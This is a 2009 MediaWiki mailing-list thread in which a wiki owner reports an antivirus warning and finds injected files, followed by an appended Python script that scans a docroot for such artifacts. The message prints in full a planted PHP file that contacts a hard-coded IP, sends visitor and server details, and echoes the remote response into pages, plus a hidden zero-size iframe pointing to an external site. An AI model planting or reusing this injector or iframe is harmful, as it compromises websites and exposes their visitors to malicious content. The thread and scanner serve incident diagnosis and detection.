I notice several files that seem to have been modified at the docroot level:

foter.php (never noticed this one before) with this content:

<?php
$ip = '209.62.27.83';
$port = '80';
$path = '/linkr/get/';
$fp = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$fp) {
        echo '';
} else {
        $post = "u=".rawurlencode($_SERVER['HTTP_USER_AGENT'])."&h=".rawurlencode($_SERVER['SERVER_NAME']);
        $out = "POST ".$path." HTTP/1.0\r\n";
        $out .= "Host: ".$ip.":".$port."\r\n";
        $out .= "Content-Type: text/html\r\n";
        $out .= "Content-Length: ".strlen($post)."\r\n";
        $out .= "Connection: Close\r\n";
        $out .= "\r\n";
        $out .= $post;
        fwrite($fp, $out);
        $resp = '';
        while (!feof($fp)) {
                $resp .= fgets($fp, 128);
        }
        fclose($fp);
        $paths = split("\r\n\r\n", $resp);
        echo $paths[1];
}
?>



and this "m-analytics" code was added to an old index page and a
Google verification page:


<iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Same thing happened to another wiki on this site, where the
m-analytics iframe was added. I *did not* add this, so I suspect foul
play.

Thoughts?

Tim





.........................................................Tim Ware.........................................................
HyperArts .. 201 4th Street, Ste 404 .. Oakland CA 94607
        t: (510) 339-6084 .. f: (510) 339-6086 .. e: [email protected] .. twitter.com/hyperarts
http://www.hyperarts.com




On Jun 22, 2009, at 12:05 PM, Mark (Markie) wrote:

> You seem to also have external content running on there such as m-analytics
> and addthis, try removing them and asking them to check again.  If it still
> happens then you can confirm a MediaWiki problem, but I suspect it may be
> the analytics or similar triggering this as it's the only content loading in
> an iframe and this is what the error seems to suggest.
>
> Regards
>
> Mark
>
> On Mon, Jun 22, 2009 at 7:59 PM, Tim Ware <[email protected]> wrote:
>
>> I got an email from someone accessing my wiki:
>>
>> http://against-the-day.pynchonwiki.com/wiki/index.php?title=Main_Page
>>
>> I'm using v 1.9.3
>>
>> Here's the message I received:
>>
>> I get a message
>> from Avast anti-virus that the page is infected with :
>> HTML:Iframe-inf.
>> I have contacted Avast who says this is not a false positive.
>> You can Google
>> virus name--it seems that this infection is fairly common.
>> Please let me know if the infection is real--I would like to use the
>> wiki.
>>
>> Any idea of what I should do to address this?
>>
>> Thanks!
>> Tim
>>
>>
>> .........................................................Tim
>> Ware.........................................................
>> HyperArts .. 201 4th Street, Ste 404 .. Oakland CA 94607
>>       t: (510) 339-6084 .. f: (510) 339-6086 .. e:
>> [email protected] .. twitter.com/hyperarts
>> http://www.hyperarts.com
>>
>>
>>
>>
>>
>> _______________________________________________
>> MediaWiki-l mailing list
>> [email protected]
>> https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
>>


_______________________________________________
MediaWiki-l mailing list
[email protected]
https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
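
A triage check for the two artifacts described in this message (a hidden, zero-size iframe with an external src, and a PHP file that opens a socket to a hard-coded IP), as an added example that is not part of the original thread. The function names, patterns and sample strings are assumptions constructed for illustration; the samples use a reserved example host and a documentation IP.

```python
import re
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I | re.S)
SRC_RE = re.compile(r"""src\s*=\s*["']?\s*(https?://[^\s"'>]+)""", re.I)
ZERO_RE = re.compile(r"""\b(width|height)\s*=\s*["']?0\b""", re.I)
HIDDEN_RE = re.compile(
    r"""display\s*:\s*none|visibility\s*:\s*hidden|style\s*=\s*["']?hidden""", re.I)
FSOCK_RE = re.compile(r"\bfsockopen\s*\(", re.I)
IPV4_RE = re.compile(r"""["'](\d{1,3}(?:\.\d{1,3}){3})["']""")

# Constructed samples (reserved example host and documentation IP).
SAMPLE_PAGE = ('<p>Main page</p><iframe src="http://tracker.example.invalid/x/?abc" '
               'width=0 height=0 style="hidden" frameborder=0 marginwidth=0></iframe>')
SAMPLE_PHP = "<?php $ip = '192.0.2.10'; $fp = fsockopen($ip, 80, $errno, $errstr, 30); ?>"

def scan_text(text):
    """Return (kind, value) findings for one file's contents."""
    findings = []
    for tag in IFRAME_RE.findall(text):
        src = SRC_RE.search(tag)  # only absolute http(s) sources are of interest
        zero = {m.group(1).lower() for m in ZERO_RE.finditer(tag)}
        if src and (zero == {"width", "height"} or HIDDEN_RE.search(tag)):
            findings.append(("hidden-iframe", src.group(1)))
    # A script that calls fsockopen and also carries a quoted IPv4 literal
    # deserves a manual look; legitimate code usually connects by hostname.
    if FSOCK_RE.search(text):
        for ip in IPV4_RE.findall(text):
            findings.append(("php-socket-to-literal-ip", ip))
    return findings

def scan_docroot(root, exts=(".php", ".html", ".htm")):
    """Walk a document root and map each suspicious file to its findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

if __name__ == "__main__":
    print(scan_text(SAMPLE_PAGE))
    print(scan_text(SAMPLE_PHP))
```

A hit is a lead for manual review, not proof of compromise; compare flagged files against a known-good copy of the site and check their modification times.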
